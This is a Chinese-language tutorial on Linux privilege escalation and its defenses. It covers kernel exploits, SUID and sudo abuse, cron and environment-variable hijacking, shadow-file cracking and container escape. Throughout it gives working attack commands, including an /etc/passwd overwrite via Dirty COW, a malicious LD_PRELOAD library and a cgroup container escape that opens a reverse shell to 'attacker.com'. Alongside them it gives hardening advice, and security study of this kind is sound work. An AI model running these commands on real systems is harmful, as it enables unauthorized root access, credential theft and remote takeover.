Linux权限提升技术与防御实战指南

1. Linux权限提升概述

在Linux系统管理和安全评估工作中，权限提升是一个永恒的话题。作为系统管理员，了解这些技术可以帮助我们更好地加固系统；作为安全研究人员，掌握这些方法则能更全面地评估系统安全性。本文将系统性地介绍Linux环境下常见的权限提升技术，从内核漏洞到配置错误，从特殊权限到环境变量，涵盖十余种实际可用的提权方法。

我从事Linux系统安全工作已有八年时间，处理过数百台服务器的安全事件。在这些实战经历中，我发现90%的成功入侵都伴随着某种形式的权限提升。很多管理员只关注外部防护，却忽视了系统内部的权限控制，这往往成为攻击者突破的最后一道防线。

2. 内核漏洞提权

2.1 内核漏洞原理与危害

内核漏洞提权是直接利用Linux内核代码中的安全缺陷获取root权限。这类漏洞通常影响范围广、危害严重，因为内核运行在最高特权级别(Ring 0)。常见的内核漏洞类型包括：

• 内存破坏类：缓冲区溢出、use-after-free、双重释放等
• 逻辑错误类：条件竞争、权限检查缺失、符号链接处理不当等
• 信息泄露类：内核地址泄露、敏感数据读取等

这些漏洞一旦被利用，攻击者可以直接获得系统最高控制权，完全绕过用户空间的权限控制机制。

2.2 漏洞检测与信息收集

在尝试内核提权前，我们需要全面收集目标系统信息：

bash复制# 获取内核版本和发行版信息
uname -a
cat /etc/*-release
cat /proc/version

# 检查系统架构
uname -m

# 查看已安装的内核补丁
rpm -qa | grep kernel
dpkg -l | grep linux-image

我通常会使用自动化工具辅助检测潜在可利用漏洞：

bash复制# Linux Exploit Suggester
wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh
chmod +x linux-exploit-suggester.sh
./linux-exploit-suggester.sh -k $(uname -r)

# 更全面的PEASS-ng工具集
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh

2.3 典型内核漏洞案例分析

2.3.1 Dirty COW (CVE-2016-5195)

这个经典的竞态条件漏洞影响了2016年之前的大多数Linux发行版：

bash复制# 下载并编译exploit
wget https://github.com/dirtycow/dirtycow.github.io/raw/master/dirtyc0w.c
gcc -pthread dirtyc0w.c -o dirtyc0w

# 利用漏洞修改只读文件
./dirtyc0w /etc/passwd "root::0:0:root:/root:/bin/bash"

注意：这个exploit会直接修改系统文件，可能导致系统不稳定，生产环境慎用。

2.3.2 PwnKit (CVE-2021-4034)

Polkit的pkexec组件漏洞影响几乎所有主流发行版：

bash复制# 下载预编译的exploit
wget https://github.com/arthepsy/CVE-2021-4034/raw/main/cve-2021-4034-poc.c
gcc cve-2021-4034-poc.c -o pwnkit
./pwnkit

这个漏洞的特别之处在于它不需要任何依赖，静态编译后可以跨系统使用。

2.4 内核提权防御建议

1. 及时更新内核：定期应用安全补丁
2. 使用GRSEC或SELinux：增强内核安全防护
3. 限制/proc访问：防止信息泄露
4. 禁用不必要的内核模块：减少攻击面
5. 监控系统调用：检测异常行为

3. SUID/SGID提权技术

3.1 SUID/SGID机制详解

SUID(Set User ID)和SGID(Set Group ID)是Linux的特殊权限位，它们改变了进程执行时的有效用户ID或组ID。当可执行文件设置了SUID位时，任何用户执行该文件都会以文件所有者的权限运行。

查看SUID权限的标志：

code复制-rwsr-xr-x  # s表示SUID
-rwxr-sr-x  # s表示SGID

3.2 发现SUID/SGID文件

全面查找系统上的SUID/SGID文件：

bash复制# 查找所有SUID文件
find / -perm -u=s -type f 2>/dev/null

# 查找所有SGID文件
find / -perm -g=s -type f 2>/dev/null

# 查找可写的SUID文件（更危险）
find / -perm -u=s -type f -writable 2>/dev/null

3.3 常见SUID提权案例

3.3.1 find命令滥用

bash复制# 利用find执行shell
find /etc -exec /bin/sh -p \; -quit

# 更隐蔽的方式
find /etc -name "*.conf" -exec /bin/bash -p \;

3.3.2 vim/vi编辑器

bash复制# 启动vim后执行命令
vim -c ':py import os; os.execl("/bin/sh", "sh", "-p")'

# 或者直接进入shell
vim -c ':!bash -p'

3.3.3 利用bash

bash复制# 如果bash本身有SUID
bash -p  # -p参数保留特权

3.4 SUID提权防御措施

1. 定期审计SUID文件：

   bash复制# 每周审计脚本示例
   find / -perm -4000 -type f -ls | tee /var/log/suid_audit_$(date +%F).log
   

2. 最小权限原则：只为必要程序设置SUID

3. 使用chattr锁定敏感文件：

   bash复制chattr +i /usr/bin/find
   

4. 考虑使用capabilities替代SUID：

   bash复制setcap cap_net_raw+ep /usr/bin/ping
   

4. Sudo配置不当提权

4.1 Sudo机制安全风险

Sudo是Linux中最常用的权限委托工具，但配置不当会带来严重安全问题。常见风险包括：

• 过于宽松的NOPASSWD规则
• 通配符使用不当
• 危险命令的组合使用
• 环境变量继承问题

4.2 Sudo权限审计方法

检查当前用户的sudo权限：

bash复制sudo -l

# 详细查看所有用户的sudo权限
sudo cat /etc/sudoers
sudo cat /etc/sudoers.d/*

4.3 典型sudo提权场景

4.3.1 编辑器提权

bash复制# 如果允许sudo vim
sudo vim -c ':!bash'

# 或者通过编辑器修改sudoers文件
sudo visudo
# 添加: username ALL=(ALL) NOPASSWD:ALL

4.3.2 利用LD_PRELOAD

bash复制# 如果允许sudo设置LD_PRELOAD
sudo LD_PRELOAD=/tmp/evil.so apache2

4.3.3 通配符滥用

bash复制# 假设有备份权限
sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/bash

4.4 Sudo安全配置建议

1. 避免使用NOPASSWD：除非绝对必要
2. 精确控制命令参数：

   code复制user ALL=(root) /usr/bin/apt update
   

3. 使用环境变量重置：

   code复制Defaults env_reset
   Defaults !env_keep
   

4. 启用sudo日志：

   code复制Defaults logfile="/var/log/sudo.log"
   

5. 计划任务提权

5.1 计划任务安全风险

系统计划任务(cron)以root权限运行时，如果配置不当可能被利用：

• 可写的cron脚本
• 环境变量依赖
• 相对路径使用
• 输出重定向到可写位置

5.2 发现计划任务漏洞

bash复制# 查看系统级计划任务
ls -la /etc/cron*
cat /etc/crontab

# 查看用户级计划任务
crontab -l
ls -la /var/spool/cron/crontabs/

5.3 计划任务提权方法

5.3.1 可写脚本替换

bash复制# 发现可写的备份脚本
echo 'cp /bin/bash /tmp/rootshell; chmod +s /tmp/rootshell' >> /etc/cron.daily/backup

5.3.2 通配符利用

bash复制# 如果cron执行: tar -zcf /backups/backup-*.tar.gz *
touch /var/www/--checkpoint=1
touch /var/www/--checkpoint-action=exec=sh\ shell.sh

5.4 计划任务安全实践

1. 设置严格的文件权限：

   bash复制chmod 700 /etc/cron.d/
   chmod 600 /etc/crontab
   

2. 使用绝对路径：在cron脚本中

3. 限制cron命令：通过/etc/cron.allow控制

4. 监控cron变更：使用auditd或inotify

6. 环境变量提权

6.1 PATH变量滥用

当程序以高权限运行但没有使用绝对路径时：

bash复制# 在当前目录创建恶意ls
echo '/bin/bash -p' > /tmp/ls
chmod +x /tmp/ls

# 修改PATH
export PATH=/tmp:$PATH

# 执行依赖PATH的程序
sudo apache2ctl restart

6.2 LD_PRELOAD劫持

bash复制# 创建恶意库
echo '#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init() {
    unsetenv("LD_PRELOAD");
    setgid(0);
    setuid(0);
    system("/bin/bash");
}' > /tmp/evil.c

gcc -fPIC -shared -o /tmp/evil.so /tmp/evil.c

# 执行
sudo LD_PRELOAD=/tmp/evil.so apache2

6.3 防御环境变量攻击

1. 使用绝对路径：在脚本和配置中
2. 重置环境变量：

   bash复制# 在sudoers中
   Defaults env_reset
   

3. 限制敏感环境变量：

   bash复制Defaults env_delete += "LD_PRELOAD LD_LIBRARY_PATH"
   

7. 密码与哈希提权

7.1 密码文件分析

bash复制# 查找可读的shadow文件
ls -la /etc/shadow

# 查找备份文件
find / -name "*shadow*" -type f 2>/dev/null

7.2 密码哈希破解

bash复制# 提取哈希
cat /etc/shadow | grep root

# 使用john破解
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

7.3 密码安全建议

1. 使用强密码策略
2. 限制/etc/shadow访问
3. 定期审计密码哈希
4. 启用sudo密码：即使配置了NOPASSWD

8. 容器逃逸技术

8.1 容器环境检测

bash复制# 检查是否在容器中
cat /proc/1/cgroup | grep docker
ls -la /.dockerenv

8.2 常见逃逸方法

8.2.1 特权容器逃逸

bash复制# 如果以--privileged运行
mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
echo 1 > /tmp/cgrp/x/notify_on_release
host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
echo "$host_path/cmd" > /tmp/cgrp/release_agent
echo '#!/bin/sh' > /cmd
echo "bash -c 'bash -i >& /dev/tcp/attacker.com/4444 0>&1'" >> /cmd
chmod +x /cmd
echo $$ > /tmp/cgrp/x/cgroup.procs

8.2.2 挂载逃逸

bash复制# 如果挂载了敏感目录
docker run -v /:/hostfs ...
# 在容器内
chroot /hostfs bash

8.3 容器安全加固

1. 避免使用--privileged
2. 限制capabilities
3. 使用只读文件系统
4. 启用seccomp和AppArmor

9. 自动化提权工具

9.1 LinPEAS

bash复制wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh

9.2 Linux Exploit Suggester

bash复制wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh
chmod +x linux-exploit-suggester.sh
./linux-exploit-suggester.sh

9.3 GTFOBins参考

访问 https://gtfobins.github.io/ 查询各种二进制文件的提权方法。

10. 系统加固建议

1. 定期更新系统：包括内核和所有软件包
2. 最小权限原则：只为必要操作授权
3. 启用SELinux/AppArmor：强制访问控制
4. 日志监控：检测可疑活动
5. 定期安全审计：使用lynis等工具

在实际工作中，我发现很多提权漏洞都是由于管理员疏忽造成的。保持系统精简、权限最小化和持续监控是防御权限提升攻击的最有效方法。